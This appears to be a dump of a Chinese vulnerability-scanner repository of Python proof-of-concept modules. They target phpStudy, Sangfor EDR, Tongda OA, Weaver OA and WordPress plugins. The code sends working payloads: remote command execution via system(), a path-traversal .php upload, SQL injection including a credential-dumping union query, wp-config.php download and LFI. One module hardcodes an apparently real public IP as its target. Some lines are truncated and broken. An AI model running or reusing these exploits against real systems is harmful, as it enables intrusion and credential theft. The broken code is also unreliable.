"phpinfo" in str(pocRequest.content): 16 | cprint("[+]存在phpstudy_backdoor漏洞\tpayload: "+self.url, "green") 17 | return True 18 | else: 19 | cprint("[-]不存在phpstudy_backdoor漏洞", "white", "on_grey") 20 | except : 21 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 22 | 23 | if __name__ == "__main__": 24 | test=phpstudy_backdoor_BaseVerify('http://192.168.5.8') 25 | test.run() 26 | 27 | -------------------------------------------------------------------------------- /POC_Scan/cms/sangfor/__pycache__/sanfor_edr.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/sangfor/__pycache__/sanfor_edr.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/sangfor/sanfor_edr.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib3 4 | from termcolor import cprint 5 | import sys 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | class sanfor_edr_rce_BaseVerify(): 9 | def __init__(self,target): 10 | self.target = target 11 | self.payload = '/tool/log/c.php?strip_slashes=system&host=echo hello' 12 | 13 | def run(self): 14 | headers={ 15 | 'Connection': 'close', 16 | 'Cache-Control': 'max-age=0', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36', 19 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 20 | 'Sec-Fetch-Site': 'none', 21 | 'Sec-Fetch-Mode': 'navigate', 22 | 'Sec-Fetch-User': '?1', 23 | 'Sec-Fetch-Dest': 'document', 24 | 'Accept-Encoding': 'gzip, deflate', 25 | 'Accept-Language': 'zh-CN,zh;q=0.9' 26 | } 27 | 28 | url=self.target+self.payload 29 | 30 | 
try: 31 | response = requests.get(url,verify=False,headers=headers) 32 | response.raise_for_status() 33 | response.encoding = "utf-8" 34 | res=re.findall(r'Log Helper

(.+?)
可能不存在漏洞", "cyan")
42 | 
43 | if __name__ == '__main__':
44 | 
45 |     tarhet = 'https://202.96.186.66:9443/'
46 |     sanfor = sanfor_edr_rce_BaseVerify(tarhet)
47 |     sanfor.run()
48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/tongda_oa/__pycache__/tongdaRCE.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/tongda_oa/__pycache__/tongdaRCE.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/tongda_oa/tongdaRCE.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from termcolor import cprint
 3 | 
class tongda_rce_BaseVerify():
    '''
    Check for the Tongda OA RCE by attempting an upload and fetching the result.

    NOTE(review): this check is not read-only. It POSTs a file named
    ``dadada.php`` to the target's upload endpoint and then requests
    ``/_dadada.php``; nothing in this module removes what was uploaded, so a
    positive result leaves an artifact on the target. Expect all four
    requests below to appear in the target's web-server and upload logs.
    '''
    def __init__(self, target: str):
        # Base URL of the target; every URL below is built by concatenating
        # a path that starts with "/" onto it.
        self.target=target

    def run(self):
        '''
        Run the check.

        Returns True when ``/_dadada.php`` is served after the upload attempt;
        otherwise prints a status line and returns None (implicitly). Every
        exception, including network errors, is swallowed by the bare
        ``except`` and reported as "possibly not vulnerable".
        '''
        try:
            # Body of the uploaded file. It is empty, so a "successful" upload
            # creates an empty .php file; nothing is executed by this check.
            payload = ""
            url=self.target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
            requests.get(url=url)
            url=self.target+"/inc/auth.inc.php"
            page=requests.get(url=url).text
            if 'No input file specified.' not in page:
                # Deliberate ValueError used as a jump to the except branch,
                # which reports the target as probably not vulnerable.
                int('a')
            url=self.target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
            files = {'FILE1': ('dadada.php', payload)}
            requests.post(url=url,files=files)
            url=self.target+"/_dadada.php"
            page=requests.get(url=url).text
            if 'No input file specified.' not in page:
                cprint("[+]存在通达OA-RCE漏洞...(信息)\t","green")
                # NOTE(review): cprint's second positional argument is the
                # colour name; ``url`` is passed in that position here.
                cprint("[+]URL:",url)
                return True
            else:
                cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
        except:
            # NOTE(review): bare except hides timeouts, DNS failures and the
            # ValueError above alike. None of the requests in this method
            # sets a timeout, so an unresponsive host can block indefinitely.
            cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")
30 | 
if __name__ == '__main__':
    # NOTE(review): ``tongda_RCE_BaseVerify`` does not match the class
    # defined above (``tongda_rce_BaseVerify``), and the target is an empty
    # string, so running this file directly fails with NameError before any
    # request is made. The class is presumably meant to be driven by the
    # scanner's loader rather than from here.
    tongda = tongda_RCE_BaseVerify('')
    tongda.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_db_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_download_sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/weaver_oa/__pycache__/weaver_oa_filedownload.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/weaver_oa_db_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: 泛微OA 数据库配置泄露
 5 | referer: http://www.loner.fm/bugs/bug_detail.php?wybug_id=wooyun-2014-087500
 6 | author: Lucifer
 7 | description: mysql_config.ini泄露。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
class weaver_oa_db_disclosure_BaseVerify:
    '''
    Check whether a Weaver (泛微) OA instance exposes ``/mysql_config.ini``.

    A single unauthenticated GET is made; the target is reported vulnerable
    when the response body contains ``datapassword``. Only the URL is
    printed, never the response contents.
    '''
    def __init__(self, url: str):
        # Base URL; the payload path is concatenated directly onto it.
        self.url = url

    def run(self):
        '''
        Fetch the config path and print/return the result.

        Returns True on a match, otherwise None (implicitly) after printing a
        status line. Any exception -- timeout, connection error, TLS failure --
        is swallowed by the bare ``except`` and reported as "possibly not
        vulnerable".
        '''
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/mysql_config.ini"
        vulnurl = self.url + payload

        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # No status-code check: any response whose body contains the
            # marker counts, so a catch-all page that echoes it would be a
            # false positive.
            if r"datapassword" in req.text:
                cprint("[+]存在泛微OA 数据库配置泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在weaver_oa_db_disclosure漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except; failures are indistinguishable from
            # "not vulnerable" to the caller, which receives None either way.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 | 
if __name__ == "__main__":
    # Silences every warning, including urllib3's InsecureRequestWarning
    # that verify=False triggers on HTTPS targets.
    warnings.filterwarnings("ignore")
    # No argument check: a missing target URL raises IndexError here.
    testVuln = weaver_oa_db_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/weaver_oa_download_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: 泛微OA filedownaction SQL注入
 5 | referer: https://wooyun.shuimugan.com/bug/view?bug_no=76418
 6 | author: Lucifer
 7 | description: fileid参数引起的布尔盲注。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
class weaver_oa_download_sqli_BaseVerify:
    '''
    Boolean-comparison check for the Weaver (泛微) OA FileDownloadLocation SQL injection.

    Two GETs are sent that differ only in the trailing condition (``1=1`` vs
    ``1=2``); the target is reported vulnerable when the first response's
    headers contain ``attachment`` and the second's do not. No response body
    is inspected or printed.
    '''
    def __init__(self, url: str):
        # Base URL; the two probe paths are concatenated directly onto it.
        self.url = url

    def run(self):
        '''
        Send both probes and print/return the result.

        Returns True when the two responses differ as described above,
        otherwise None (implicitly) after printing a status line. Any
        exception from either request is swallowed by the bare ``except``.
        '''
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Raw strings: the "/**/" sequences are sent literally as part of the query.
        true_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=1"
        false_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=2"

        try:
            req1 = requests.get(self.url+true_url, headers=headers, timeout=10, verify=False)
            req2 = requests.get(self.url+false_url, headers=headers, timeout=10, verify=False)
            # str(headers) stringifies the whole header mapping, so the match
            # is against any header name or value -- presumably intended for a
            # Content-Disposition: attachment header; confirm against a known
            # instance before relying on it.
            if r"attachment" in str(req1.headers) and r"attachment" not in str(req2.headers):
                cprint("[+]存在泛微OA filedownaction SQL注入漏洞...(高危)\tpayload: "+self.url+true_url, "red")
                return True
            else:
                cprint("[-]不存在weaver_oa_download_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except; a failure of either request is
            # reported the same way as a negative result.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 | 
if __name__ == "__main__":
    # Silences every warning, including urllib3's InsecureRequestWarning
    # that verify=False triggers on HTTPS targets.
    warnings.filterwarnings("ignore")
    # No argument check: a missing target URL raises IndexError here.
    testVuln = weaver_oa_download_sqli_BaseVerify(sys.argv[1])
    testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/cms/weaver_oa/weaver_oa_filedownload.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: 泛微OA downfile.php 任意文件下载漏洞
 5 | referer: 
 6 | author: Lucifer
 7 | description: fileid参数引起的布尔盲注。
 8 | '''
 9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 | 
class weaver_oa_filedownload_BaseVerify:
    '''
    Check for the Weaver (泛微) OA downfile.php arbitrary file download.

    NOTE(review): ``payload`` and ``vulnurl`` are computed in ``run`` but never
    used -- the only request goes to ``self.url`` and the printed "payload" is
    also ``self.url``, so as written the downfile.php path is never requested.
    The module header's description ("fileid参数引起的布尔盲注") also appears
    to have been copied from the download_sqli module. Confirm the intended
    behaviour before treating a positive result as meaningful.
    '''
    def __init__(self, url: str):
        # Base URL of the target.
        self.url = url

    def run(self):
        '''
        Request the base URL and look for the marker pattern in a 200 response.

        Returns True when the regex matches, otherwise None (implicitly). On a
        non-200 status nothing is printed at all. Any exception is swallowed
        by the bare ``except``.
        '''
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/E-mobile/Data/downfile.php?url=123"
        vulnurl = self.url + payload
        try:
            # Note: requests self.url, not vulnurl.
            req = requests.get(self.url, headers=headers, timeout=10, verify=False)
            if req.status_code == 200:
                # Captures the text after "No error in " up to the next "<";
                # what that text represents is not established here.
                m = re.search(r'No error in ([^<]+)', req.text)
                if m:
                    cprint("[+]存在泛微OA downfile.php 任意文件下载漏洞...(高危)\tpayload: "+self.url, "red")
                    return True
                else:
                    cprint("[-]不存在weaver_oa_filedownload漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except; failures and negatives look the same
            # to the caller.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
37 | 
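if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = weaver_oa_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()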


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_admin_ajax_filedownload.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_display_widgets_backdoor.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_ShortCode_lfi.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_azonpop_sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_plugin_mailpress_rce.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_restapi_sqli.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_url_redirect.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/wordpress/__pycache__/wordpress_woocommerce_code_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_admin_ajax_filedownload.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress admin-ajax.php任意文件下载
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 文件admin-ajax.php中,参数img存在任意文件下载漏洞。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
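class wordpress_admin_ajax_filedownload_BaseVerify:
    """Probe a WordPress site for the revslider ``admin-ajax.php`` file-download issue.

    A positive verdict means the site's ``wp-config.php`` (which holds the
    database credentials) was returned to an unauthenticated request; those
    credentials should be treated as exposed and rotated once the plugin is fixed.
    """

    def __init__(self, url):
        # Base URL of the target, stored verbatim (no trailing-slash normalisation).
        self.url = url

    def run(self):
        """Send one GET request and print the verdict.

        Returns:
            True when the response body contains both ``DB_NAME`` and
            ``DB_USER``; False otherwise, including when the request fails
            (reported as "可能不存在漏洞").
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
        vulnurl = self.url + payload
        try:
            # verify=False kept as in the original (presumably to tolerate self-signed target certificates).
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException:
            # Only transport failures are swallowed; the former bare ``except`` also
            # hid KeyboardInterrupt, SystemExit and programming errors.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return False
        # Both markers are required so a page that merely mentions one of them is not a hit.
        if r"DB_NAME" in req.text and r"DB_USER" in req.text:
            cprint("[+]存在wordpress admin-ajax.php任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在wordpress_admin_ajax_filedownload漏洞", "white", "on_grey")
        return False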
34 | 
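if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_admin_ajax_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()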


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_display_widgets_backdoor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress display-widgets插件后门漏洞
 5 | referer: http://www.nsfocus.com.cn/upload/contents/2017/09/20170915174457_73771.pdf
 6 | author: Lucifer
 7 | description: wordpress display-widgets Version 2.6.1——Version 2.6.3.1 geolocation.php存在后门。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
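class wordpress_display_widgets_backdoor_BaseVerify:
    """Check whether the backdoored display-widgets ``geolocation.php`` is reachable.

    The verdict rests on the HTTP status alone (200 = present), so hosts that
    answer 200 for every path (catch-all pages) will show as positive; confirm
    a hit by inspecting the plugin version on the host.
    """

    def __init__(self, url):
        # Base URL of the target, stored verbatim (no trailing-slash normalisation).
        self.url = url

    def run(self):
        """Send one GET request and print the verdict.

        Returns:
            True when the file answers with status 200; False otherwise,
            including when the request fails (reported as "可能不存在漏洞").
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-content/plugins/display-widgets/geolocation.php"
        vulnurl = self.url + payload
        try:
            # allow_redirects=False: a redirect to a login or error page must not
            # be followed to a 200 and mistaken for the file being present.
            # verify=False kept as in the original (presumably for self-signed target certificates).
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
        except requests.RequestException:
            # Only transport failures are swallowed; the former bare ``except`` also
            # hid KeyboardInterrupt, SystemExit and programming errors.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return False
        if req.status_code == 200:
            cprint("[+]存在wordpress display-widgets插件后门漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在wordpress_display_widgets_backdoor漏洞", "white", "on_grey")
        return False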
34 | 
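if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_display_widgets_backdoor_BaseVerify(sys.argv[1])
    testVuln.run()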
39 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_plugin_ShortCode_lfi.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress 插件shortcode0.2.3 本地文件包含
 5 | referer: https://www.exploit-db.com/exploits/34436
 6 | author: Lucifer
 7 | description: 文件force-download.php参数file未过滤存在文件包含漏洞。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class wordpress_plugin_ShortCode_lfi_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payloads = ["/force-download.php?file=force-download.php",
23 |                     "/wp/wp-content/force-download.php?file=force-download.php",
24 |                     "/wp-content/force-download.php?file=force-download.php",
25 |                     "/wp-content/themes/ucin/includes/force-download.php?file=force-download.php",
26 |                     "/wp-content/uploads/patientforms/force-download.php?file=force-download.php"] 
27 |         try:
28 |             for payload in payloads:
29 |                 vulnurl = self.url + payload
30 |                 req = requests.get(vulnurl, headers=headers, timeout=5, verify=False)
31 |                 if r"可能不存在漏洞", "cyan")
39 | 
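if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_plugin_ShortCode_lfi_BaseVerify(sys.argv[1])
    testVuln.run()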


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_plugin_azonpop_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: Wordpress AzonPop插件SQL注入
 5 | referer: https://cxsecurity.com/issue/WLB-2016010049
 6 | author: Lucifer
 7 | description: payload:/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/ wp_users
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
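class wordpress_plugin_azonpop_sqli_BaseVerify:
    """Probe the AzonPop plugin's ``showpopup.php`` for SQL injection via ``popid``.

    The injected expression asks the database to compute ``Md5(1234)``; the
    response is then searched for that digest, so a hit means the server
    evaluated the supplied SQL rather than treating ``popid`` as data.
    """

    def __init__(self, url):
        # Base URL of the target, stored verbatim (no trailing-slash normalisation).
        self.url = url

    def run(self):
        """Send one GET request and print the verdict.

        Returns:
            True when the body contains the MD5 digest of ``1234``
            (``81dc9bdb52d04dc20036dbd8313ed055``); False otherwise, including
            when the request fails (reported as "可能不存在漏洞").
        """
        headers = {
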